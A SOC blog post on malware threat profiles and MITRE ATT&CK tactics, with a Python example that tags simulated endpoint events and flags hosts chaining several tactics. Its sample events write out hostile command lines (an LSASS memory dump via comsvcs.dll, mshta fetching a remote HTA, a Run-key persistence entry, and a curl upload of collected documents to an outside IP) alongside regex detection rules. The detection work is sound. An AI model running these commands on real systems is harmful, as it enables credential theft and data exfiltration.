Thursday, March 28, 2024

SOC Second Defense Phase – Understanding the Cyber Threat Profiles

In the first phase of architecting the SOC, we looked at a basic understanding of attacks and the steps needed to break the attack chain. Let's move on to the next phase of the SOC and to a more advanced level of protecting the organization from the various threat profiles.

In the early years, a "virus" was just an .exe file that threw up a few pop-ups. Most of them were written by script kiddies and did no real damage to the PCs they infected.

Modern-day malware, by contrast, is not written by script kiddies; it is developed by organized groups and companies for profit, and there is a motive and an agenda behind every malware family created.

The older malware families were grouped as virus, worm, PUP, spyware, adware, polymorphic virus, fake AV and screensaver virus. These caused little impact, and there was usually no business motive behind them.


Nowadays, however, the threat-profile and malware landscape is far larger and wider, with unique coding techniques: modern malware has built-in capabilities to download further malicious code, exfiltrate data, communicate with outside servers, erase data, encrypt files and much more.

This modern-day malware is created with an agenda, a modus operandi and, above all, a financial motive.


The modern-day malware families include trojans, rootkits, bots and botnets, POS malware, ATM malware, ransomware, cryptomining malware, spybots, wipers, C2 trojans, exploit kits, browser hijackers, credential stealers, RATs, WMI backdoors, skeleton keys, keyloggers and so on.


So a basic understanding of modern threats is necessary for every SOC team, and understanding threat profiles matters even more in day-to-day SOC monitoring.

The SOC should know what it is dealing with: it should understand the behaviour, differentiate the patterns, know the variants released by the attacker community, and know how to handle each of them without disrupting the business.

Threat profiles are the types of malware, scripts, abused vulnerable applications, and network and Windows artifacts that a cybercriminal (threat actor) uses to accomplish an attack on your organization.
These capabilities can be classified by the tactic they serve; the categories below are the tactics as defined in the MITRE ATT&CK enterprise matrix:

1.) Initial Access – Techniques attackers use to gain an initial foothold within a network, such as phishing, exploitation of a public-facing application or the use of valid accounts.

2.) Execution – Techniques that result in adversary-controlled code running on a local or remote system. This tactic is often used in conjunction with Initial Access as the means of executing code once access is obtained, and with Lateral Movement to expand access to remote systems on a network.

3.) Persistence – Persistence is any access, action or configuration change to a system that gives an adversary a persistent presence on that system.

Adversaries often need to maintain access through interruptions such as system restarts, loss of credentials or other failures that would otherwise require a remote access tool to be restarted, or an alternate backdoor to be used, for them to regain access.

4.) Privilege Escalation – Privilege escalation is the result of actions that allows an adversary to obtain a higher level of permissions on a system or network. Certain tools or actions require a higher level of privilege to work and are likely necessary at many points throughout an operation.

Adversaries can enter a system with unprivileged access and must take advantage of a system weakness to obtain local administrator or SYSTEM/root-level privileges.

5.) Defense Evasion – Defense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation.

6.) Credential Access – Credential access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment.

Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrator or domain users with administrator access) to use within the network.

7.) Discovery – Discovery consists of techniques that allow the adversary to gain knowledge about the system and internal network.

When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion.

8.) Lateral Movement – Lateral movement consists of techniques that enable an adversary to access and control remote systems on a network; it may, but need not, include execution of tools on those remote systems.

Some lateral movement techniques allow an adversary to gather information from a system without needing additional tooling such as a remote access tool.

9.) Collection – Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

10.) Exfiltration – Exfiltration refers to techniques and attributes that result in, or aid, the adversary removing files and information from a target network, typically after the data has been collected and staged, over the existing command and control channel or an alternate channel.

11.) Command and Control – The command and control tactic represents how adversaries communicate with systems under their control within a target network.

There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology.

Due to the wide degree of variation available to the adversary at the network level, only the most common factors are used to describe the differences in command and control.
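The tactic list above is the vocabulary a SOC uses to describe what it is seeing. As an added example that is not part of the original article, the Python below tags a handful of constructed Sysmon-style process-creation events with the tactic each most plausibly represents, then correlates the tactics seen per host inside a time window, so that a chain of Execution, Discovery, Persistence, Credential Access, Lateral Movement and Exfiltration on one workstation stands out where any single event would be lost in the noise. The field names, hosts, command lines and the regex rules are all assumptions made up for the illustration, not a vetted detection ruleset.

```python
"""Added example, not from the original article: tag constructed endpoint
events with the tactic they most plausibly represent, then correlate the
tactics seen per host so that a chain of several tactics on one machine
stands out the way a single noisy alert does not.  Field names, hosts,
command lines and rules are all assumptions made for the illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Coarse, illustrative rules (not a vetted ruleset): tactic -> regex over the
# command line.  Command and Control is left out on purpose; it is rarely
# visible in process creation alone and belongs to network telemetry.
TACTIC_RULES = [(t, re.compile(p, re.I)) for t, p in [
    ("Execution", r"\b(mshta|wscript|cscript|regsvr32)\.exe\b.*https?://"),
    ("Execution", r"powershell.*(-enc\b|-encodedcommand|downloadstring|\biex\b)"),
    ("Persistence", r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b"),
    ("Persistence", r"\bschtasks(\.exe)?\s+/create\b"),
    ("Defense Evasion", r"\bwevtutil(\.exe)?\s+cl\b"),
    ("Credential Access", r"comsvcs\.dll.*minidump|procdump.*lsass"),
    ("Discovery", r"\b(whoami|nltest|net\s+(group|user|view)|ipconfig\s+/all)\b"),
    ("Lateral Movement", r"\bpsexec|\bwmic(\.exe)?\s+/node:|\bwinrs(\.exe)?\s+-r:"),
    ("Collection", r"\b(7z|rar)(\.exe)?\s+a\b"),
    ("Exfiltration", r"\bcurl(\.exe)?\b.*(\s-T\s|--upload-file)"),
]]

# Constructed Sysmon-style process-creation events (timestamp, host, user, cmdline).
def _ev(ts, host, user, cmdline):
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}

SAMPLE_EVENTS = [
    _ev("2024-03-28T09:00:01", "WS-042", "jdoe", r"mshta.exe http://198.51.100.7/invoice.hta"),
    _ev("2024-03-28T09:00:12", "WS-042", "jdoe", r'cmd.exe /c whoami /all && net group "Domain Admins" /domain'),
    _ev("2024-03-28T09:01:05", "WS-042", "jdoe", r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\jdoe\AppData\Roaming\upd.exe"),
    _ev("2024-03-28T09:02:40", "WS-042", "jdoe", r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Users\jdoe\AppData\Local\Temp\l.dmp full"),
    _ev("2024-03-28T09:03:15", "WS-017", "it-admin", r"ipconfig /all"),
    _ev("2024-03-28T09:04:02", "WS-042", "jdoe", r'wmic.exe /node:SRV-FS-01 process call create "cmd.exe /c whoami"'),
    _ev("2024-03-28T09:05:30", "WS-042", "jdoe", r"7z.exe a C:\Users\jdoe\AppData\Local\Temp\out.7z C:\Users\jdoe\Documents\*.docx"),
    _ev("2024-03-28T09:06:10", "WS-042", "jdoe", r"curl.exe -T C:\Users\jdoe\AppData\Local\Temp\out.7z https://203.0.113.9/up"),
    _ev("2024-03-28T09:06:30", "WS-042", "jdoe", r"notepad.exe C:\Users\jdoe\Desktop\readme.txt"),
]


def tag_event(event):
    """Distinct tactics whose rule matches the event's command line, sorted."""
    return sorted({t for t, rx in TACTIC_RULES if rx.search(event["cmdline"])})


def correlate(events, window_minutes=30):
    """Per host, the largest set of distinct tactics seen inside any single
    window of window_minutes; returns {host: sorted tactics}."""
    window = timedelta(minutes=window_minutes)
    per_host = defaultdict(list)
    for ev in events:
        tactics = tag_event(ev)
        if tactics:  # untagged events carry no tactic and are ignored here
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tactics))
    result = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        best = set()
        for i, (start, _) in enumerate(hits):  # slide a window from each hit
            seen = set()
            for ts, tactics in hits[i:]:
                if ts - start > window:
                    break
                seen.update(tactics)
            if len(seen) > len(best):
                best = seen
        result[host] = sorted(best)
    return result


def flag_hosts(events, min_tactics=3, window_minutes=30):
    """Hosts on which at least min_tactics distinct tactics chain together
    inside one window: the chain, not a lone event, is the intrusion signal."""
    return {h: t for h, t in correlate(events, window_minutes).items()
            if len(t) >= min_tactics}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], tag_event(ev) or "-", ev["cmdline"][:60])
    for host, tactics in flag_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {len(tactics)} tactics chained: {', '.join(tactics)}")
```

Rules like these need tuning per environment (administrators run whoami and ipconfig too, which is why the lone Discovery hit on WS-017 is not flagged), and the window length decides whether a slow, patient intrusion is ever seen as one chain; shrinking it to 30 seconds in the sample data drops the WS-042 chain to two tactics and the alert disappears.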

Let's look at some of the malware variants that generate the most noise as attack vectors in threat profiles. This list is not complete, just a sample of the variants released.

[Figure: Threat Profiles – sample table of malware variants; the table was an image and is not reproduced here]
Conclusion – Threat Profiles

Why should I worry about malware and its behaviour?

We should! Modern malware has specific ways of propagating and a more complex structure of commands for gaining and keeping a foothold.

Every piece of malware you face is not just the responsibility of your organization's AV team; it is the core responsibility of the SOC to understand its behaviour and the capabilities it possesses to intrude into your network.

They rarely act alone; in most instances several components work in combination to get the job done.
